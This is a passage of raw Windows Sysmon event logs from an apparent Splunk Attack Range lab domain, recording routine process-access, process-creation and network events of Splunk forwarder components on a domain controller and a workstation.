07:52:50.217{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57271-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:52.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39A60940798E08393A042DF4F10A39E7,SHA256=D60E69ABAC3DDDF1A2F9F3A507B3DD8EBE8DF93D6361F95F3060980C4B9EC0D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.992{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.976{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.977{466BC892-F4D4-60EB-3D7D-00000000CF01}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.593{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E22B53E6B329AC383EA127CDABCBF71A,SHA256=9DBA31FEDB2B207937131644687BEE044B7014CF546A685E51346981058E150E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.508{466BC892-F4D4-60EB-3C7D-00000000CF01}895210204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.293{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.293{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.293{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.278{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.146{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D522D3B9DCC7574B50B77C0C27698FA8,SHA256=53CA59B3A66BCA8DA77246A0977D06B2F3EDB0494B0D4732BD925F86E680BB1C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.777{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51031-false10.0.1.12-8000- 23542300x8000000000000000807673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:53.772{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C79FA223AF9B0AF19A6CA8CDCADE71,SHA256=835F2D698CA198418F6AAF4A9D10B2141685400A6FDDDD711D23F36B3813ADCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C055B9A2DB7D2F847C3B5907B0055666,SHA256=44C73E40B9400831B9F478547574750D7B45049C8285CA48FB9A4FD790E8CC5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.891{466BC892-F4D5-60EB-3E7D-00000000CF01}42568028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.691{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 